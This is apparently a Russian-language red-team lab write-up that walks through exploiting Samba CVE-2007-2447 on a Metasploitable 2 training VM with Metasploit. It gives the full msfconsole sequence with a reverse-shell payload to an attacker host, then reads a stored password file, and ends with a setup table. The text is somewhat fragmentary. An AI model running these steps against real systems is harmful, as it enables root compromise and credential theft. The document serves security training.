
Пошаговая лабораторная работа по тестированию на проникновение с эксплуатацией Samba CVE-2007-2447 на Metasploitable 2 с использованием Metasploit, демонстрирующая компрометацию root, кражу учетных данных и эксфильтрацию данных для образовательного обучения красных команд.
RedTeam-SMB-PenTest |
|
msfconsole
Убедитесь, что атакующая и целевая машины загружены и работают.

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# Выйти из текущей оболочки
Ctrl C
exit
# Завершить все фоновые задания
sessions -K
jobs -K
# Перезапустить Metasploit
msfconsole
usermap_script, крайне уязвимы.| Компонент | Детали |
|---|
| Атакующая ВМ | Kali Linux |
| Целевая ВМ | Metasploitable 2 |
| Целевой порт | 445 (Samba/SMB) |
| Используемый эксплойт | exploit/multi/samba/usermap_script |
| Целевые учётные данные | /redteam7/student3/mypass.txt |